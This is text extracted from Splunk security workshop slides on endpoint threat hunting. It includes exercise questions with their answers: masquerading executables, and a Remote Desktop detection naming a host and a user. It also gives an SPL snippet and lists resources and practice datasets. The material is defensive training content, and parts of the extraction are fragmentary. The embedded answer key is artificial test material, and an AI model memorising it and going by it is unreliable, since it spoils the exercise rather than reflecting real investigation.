Click
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Security Essentials

As we look at our endpoint data, do we have any executables running that might be
masquerading as legitimate executables but are using a similar, but slightly different name
to evade suspicion?

Two outlier files that bear additional investigation: sihost.exe and iexeplorer.exe
© 2021 SPLUNK INC.

Question #2
Enterprise Security Content Update

Remote desktop should only be run on certain systems within our environment. Find the
lateral movement analytic story and review the detection searches and find the detection
search that best meets our requirement and determine which systems are running
Remote Desktop.

Hints
• Use Enterprise Security Content Update
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

1
Click

2
Click
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Enterprise Security Content Update

Remote desktop should only be run on certain systems within our environment. Find the
lateral movement analytic story and review the detection searches and find the detection
search that best meets our requirement and determine which systems and users are
running Remote Desktop.

Detection Search: ESCU - Remote Desktop Process Running on System

Destination: AGRADY-L

User: frothly_helpdesk
© 2021 SPLUNK INC.

Conclusion
© 2021 SPLUNK INC.

Wrapping Up
Endpoint data provides crucial insight

Opportunities exist no matter the OS

Filtering and configuration are key to


good visibility

SSE and ESCU provide good content


to start with and customize to your needs

| eval EventCode = case(WindowsLogData=WindowsSecurity, “4688”,


WindowsLogData=Sysmon, “1”)
© 2021 SPLUNK INC.

Splunk Resources to Check Out

Windows Event Code Security Analysis App (Github)


• https://github.com/stressboi/splunk_wineventcode_secanalysis

Splunking the Endpoint


• https://conf.splunk.com/session/2015/conf2015_Jbrodsky_Splunk_SecurityComplinace_SplunkingTheEndpoint_FINAL.pdf

Splunking the Endpoint: Hands On!


• https://conf.splunk.com/files/2016/slides/splunking-the-endpoint-hands-on.pdf

Splunking the Endpoint Part III: Hands-On with BOTS Data!


• https://conf.splunk.com/files/2017/slides/splunking-the-endpoint-part-iii-hands-on-with-bots-data.pdf

Hunting with Splunk (Blog series)


• https://www.splunk.com/blog/2017/07/06/hunting-with-splunk-the-basics.html
© 2021 SPLUNK INC.

Non-Splunk Resources to Check Out


Michael Gough – Malware Archaeology Cheat Sheets
• https://www.malwarearchaeology.com/cheat-sheets

NSA
• https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Andrea Fortuna
• https://www.andreafortuna.org/2019/06/12/windows-security-event-logs-my-own-cheatsheet/

ASD
• https://www.cyber.gov.au/publications/windows-event-logging-and-forwarding

JP-CERT
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
© 2021 SPLUNK INC.

Data Sets to Practice Against


If you would like to get the data sets and explore further, now you can!
BOTS version 1 data set
• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-scoring-server-questions-and-answers-and-
dataset-open-sourced-and-ready-for-download.html
• Data Set: https://github.com/splunk/botsv1
• Companion investigating app: https://splunkbase.splunk.com/app/3985/

BOTS version 2 data set


• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-2-0-dataset-questions-and-answers-open-
sourced-and-ready-for-download.html
• Data Set: https://events.splunk.com/BOTS_2_0_datasets
• Companion Advanced APT Hunting app: https://splunkbase.splunk.com/app/4430/
• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-bots-advanced-apt-hunting-
companion-app-now-available-on-splunkbase.html

BOTS version 3 data set


• Blog: https://www.splunk.com/en_us/blog/security/botsv3-dataset-released.html
• Data Set: https://github.com/splunk/botsv3
© 2021 SPLUNK INC.

Splunk for Security Workshops


Building
Enterprise AWS 2: Attack in
UBA Hands-On AWS Hands-On Monitoring K8s Correlation
Security (ESHO) the Cloud Searches

Insider Threat Phantom Splunking the Splunking for Advanced APT


GCP in Splunk
Hands-On Hands-On Endpoint Fraud Hunting

Security
Security Lunch Hunting in the Investigating
Operations Suite Boss of the SOC
n’ Learn Hands-On MS Cloud with Splunk

Splunk Enterprise/Cloud Enterprise Security Phantom UBA


Introductory Advanced
© 2021 SPLUNK INC.

How Did We Do?


PonyPoll: https://ponypoll.com/securityws
© 2021 SPLUNK INC.

Thank You

You might also like